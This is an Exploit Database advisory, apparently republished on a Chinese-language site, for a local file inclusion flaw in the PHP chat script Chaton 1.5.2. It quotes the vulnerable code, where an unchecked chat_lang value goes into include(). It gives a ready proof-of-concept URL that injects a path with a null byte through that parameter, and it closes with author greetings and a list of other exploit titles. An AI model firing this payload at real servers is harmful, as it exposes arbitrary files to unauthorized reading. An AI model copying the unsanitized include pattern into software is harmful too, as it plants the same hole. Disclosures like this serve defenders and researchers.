Chaton 1.5.2 – Local File Inclusion

Exploit Database
18 阅读

作者： cr4wl3r

日期： 2010-03-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11657/

[+] Chaton <= 1.5.2 Local File Include Vulnerability
[+] Discovered By: cr4wl3r
[+] Download: Donwload: http://easy-script.com/scripts-dl/chaton-1.5.2.zip
[+] Greetz: opt!x hacker, xoron, cyberlog, mywisdom, irvian, EA ngel, bL4Ck_3n91n3, xharu, zvtral, and all my friend

[+] Code:

if (file_exists( "lang/$chat_lang/deplacer.php")) {
include( "lang/$chat_lang/deplacer.php");
}

if ($chat_salon != $newsalon) {
if ($chat_hide == false) {
// Salle publique = Recupere le vrai nom
$nomsalle = NomSalonPublic( $newsalon);
if ($nomsalle == '') {
// Salon priv�
$salon_prive = true;
$nomsalle = $newsalon;
} else {
$salon_prive = false;
}

[+] PoC: [path]/inc/deplacer.php?chat_lang=[LFI%00]

last Exploits
Chaton 1.5.2 – Local File Inclusion的更多信息

onepound Shop / CMS – Cross-Site Scripting / SQL Injection：
Joomla! Component com_xeslidegalfx – ‘id’ SQL Injection：
4Images 1.7.10 – ‘/admin/index.php?redirect’ Arbitrary Site Redirect：
WordPress Plugin Audio Player – ‘playerID’ Cross-Site Scripting：
Clinic Pro v4 – ‘month’ SQL Injection：
DIGISOL DG-HR3400 Wireless Router – Cross-Site Scripting：
SAP NetWeaver 6.4/7.0 – ‘wsnavigator’ Cross-Site Scripting：
Local Services Search Engine Management System (LSSMES) 1.0 – ‘name’ Persistent Cross-Site Scripting (XSS)：